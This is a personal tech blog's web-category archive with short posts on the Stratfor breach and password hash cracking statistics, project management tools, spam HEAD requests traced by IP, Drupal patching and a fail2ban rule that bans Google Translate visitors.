Autarchy of the Private Cave

Tiny bits of bioinformatics, [web-]programming etc

    Archive for the 'Web' Category

    Anything web-related. Just anything.

    Megahack of Stratfor

    9th January 2012

    If you haven’t heard yet – stratfor.com was hacked in December 2011, leaking full information about 75k credit cards (including owner’s addresses and CVV codes) and 860k (right, almost a million) user accounts. All Stratfor email archives were also reportedly stolen (around 160-200 GB of data), but those were not made publicly available on the internet – unlike the credit cards and user accounts information, which is still relatively easy to find and download.

    I do not really recollect anything that large. Well, not counting dropbox’s 4-hour window of “any password fits all accounts”, but that was different.

    Here are some of the news items about this seriously large hacking incident:

    Here come more technical reports:

    TheTechGerald’s analysis linked to above got my attention. Unfortunately, a while ago I’ve subscribed to stratfor’s “free intelligence mailing list”, and was wondering if my account information is now publicly available. I was the most worried about the password I’ve used to subscribe, because of the risk of using the same password somewhere else.

    Unlike TheTechGerald, I haven’t used any dictionaries – just the default configuration of a well-known tool for finding weak passwords. Within a single hour, ~100k passwords were decrypted (~12% of all). Till the end of the day, ~50k more passwords were decrypted (totalling 17.4% of 860k). At this point my password was still safe, and I’ve found a way to verify that it is not used anywhere else, so I’ve aborted further decryption.

    There are a few simple conclusions:

    • anybody who had a stratfor account must verify that he/she isn’t using that password anywhere else, because if 1 PC can get 17% of all the passwords in less than a day, it is only a matter of short time until all the leaked passwords will be decrypted and made publicly available in various “md5 decryption databases”
    • system owners should run periodic screenings for weak passwords (and implement policies to prevent creating obviously weak passwords from the very beginning)
    • md5 is very fast to decrypt/bruteforce – a much slower hashing function wouldn’t hurt; also, using a more complex hashing approach, maybe even with a closed-source shared library, could help
    • single-factor authentication (password-based) is likely to get replaced with 2-factor authentication in the nearest future
    • one may enjoy increased personal data safety by using throw-away passwords in conjunction with antispam mailboxes like spam.la and mailinator.com (at least 1600 users – 0.186% – did use these services).

    Read the rest of this entry »

    Share

    Posted in Links, Misc, Security, Software, Web | No Comments »

    Light web-based collaborative project management tools

    10th January 2011

    Updated on the 5th of March, 2010 (added flowdock and pivotal tracker, and also personal experience using a few of the previously described tools).

    Back in 2007 I wrote a brief review of web-based project management tools. After that, I started using dotProject for personal projects management. I’m still using it, but for collaborative project management, communication, and tasks/milestones tracking dotProject isn’t perfect.

    I need a tool, which is

    • collaborative
    • web-based (to allow effective collaboration)
    • preferably free
    • has concise per-project activity log
    • minimal required functionality: tasks, milestones, files, and status updates.

    After trying a few things, our small team settled for now on using github + pivotaltracker jira + confluence + flowdock.

    Here’s a full list of tools briefly reviewed. I’ve been already using ProjectPier, so I’ll start with this software.
    Read the rest of this entry »

    Share

    Posted in Links, Software, Web | 11 Comments »

    Blatant dewlance.com SEO, thrustvps, and HEAD attacks

    6th November 2010

    Update 4: there are claims that these HEAD-attacks were coming from a malicious dewlance.com customer, and have nothing to do with dewlance itself.

    Noticing weird narrow spikes in server load graph, I decided to investigate the most recent one – at 03:50 GMT+2 on Nov. 6, 2010.

    The reason was simple: someone issued a few hundred HEAD-requests over a 30 second period to a PHP-based web-application.

    All the requests were coming from IP 109.169.59.139, which belongs to the IP range of thrustvps.com:

    inetnum: 109.169.58.0 – 109.169.59.255
    netname: ThrustVPS_1
    descr: Thrust::VPS
    country: US
    admin-c: RF5058-RIPE
    tech-c: RF5058-RIPE
    status: ASSIGNED PA
    mnt-by: RAPIDSWITCH-MNT

    However, it is the referrer string which is more interesting: in all those requests, decorated with varying UserAgents and even operating systems, there was only one referrer – www.dewlance.com.

    Initially I thought that was a test of a new DoS attack – really, who would issue dozens of HEAD requests to the same page over a few seconds? However, after seeing that “referrer” string, I now think this is a cheap, blatant, poor and ugly SEO performed by dewlance. It relies on some sites displaying a box of ‘recent visitors’, sometimes including their referrer URL as a “page where this visitor came from” – this would give dewlance.com some free link-love. Or maybe dewlance.com expects administrators to investigate log files, notice that referrer string, and happily order some services from dewlance? No way :)

    I’ll file a complaint with thrustvps if I see that kind of misbehaviour again. All that started on Nov. 4, so there’s still hope people behind this dumb SEO implementation will get fired.

    Update 1: they do this every 4 hours since November 4, 2010 (Thursday). This results in loads up to 22, with ~50 apache processes struggling for a few CPU cores:
    Read the rest of this entry »

    Share

    Posted in Misc, Web | 8 Comments »

    ask.debian.net: stackoverflow for Debian with Shapado

    19th October 2010

    ask.debian.net is a StackOverflow-like Q&A website built with OSS Shapado.

    That’s my first encounter of Shapado, so it was interesting to read Shapado authors’ justification and a related question on meta.SO.

    Share

    Posted in Links, Misc, Software, Web | No Comments »

    Simple and efficient Drupal upgrades: patch!

    3rd January 2010

    Just a quick note: upgrading Drupal using a patch file is a really efficient and fast method, especially because diff/patch files are available for different Drupal version combinations.

    Share

    Posted in Drupal, Links, Notepad, Web | No Comments »

    Does Google attack your servers, too?

    5th December 2009

    Evil?

    For about 2 weeks now, I am every day alerted of the suspicious behavior of some computer/server from the Google’s IP range:
    Read the rest of this entry »

    Share

    Posted in Misc, Web | No Comments »

    fail2ban and Google translate: how to easily cut your WP blog traffic

    14th November 2009

    translate_logofail2ban has a php-url-fopen rule.

    WordPress has a Global Translator plugin, which – among others – uses Google Translate service.

    If someone uses Google Translate (e.g. using Global Translate’s mini-language-flags), and goes back to your blog – that someone might get banned by fail2ban (especially if you have set maxretry to 1), as the referrer will contain the php-URL-fopen attack signature. The bad thing is that you will not realize that until after you check one or several translations yourself, as a random site visitor experiencing the problem is highly unlikely to bother reporting this problem – especially when your blog’s Contact page is also inaccessible.

    Clearly, Google Translate is not the only legitimate service which will trigger that rule.

    Solution: The only solution I have found is to specify the whitelist regex for the php-URL-fopen rule.

    Share

    Posted in *nix, Software, Web, WP PlugIns | No Comments »